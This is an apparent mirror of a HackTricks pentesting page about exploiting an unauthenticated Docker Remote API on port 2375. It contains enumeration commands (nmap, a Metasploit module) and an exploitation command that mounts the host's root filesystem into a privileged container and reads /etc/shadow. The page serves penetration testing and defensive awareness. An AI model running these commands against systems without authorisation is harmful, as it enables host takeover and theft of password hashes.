mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-16 01:38:20 +00:00
985 B
985 B
2375 Pentesting Docker
2375 - Pentesting Docker API
Basic Information
Remote API is running by default on 2375 port when enabled. The service by default will not require authentication allowing an attacker to start a privileged docker container. By using the Remote API one can attach hosts / root directory
to the container and read/write files of the host’s environment.
Default port: 2375
PORT STATE SERVICE
2375/tcp open docker
Enumeration
msf> use exploit/linux/http/docker_daemon_tcp
nmap -sV --script "docker-*" -p <PORT> <IP>
Exploitation
Check if it’s vulnerable to execute arbitrary code:
docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
cat /mnt/etc/shadow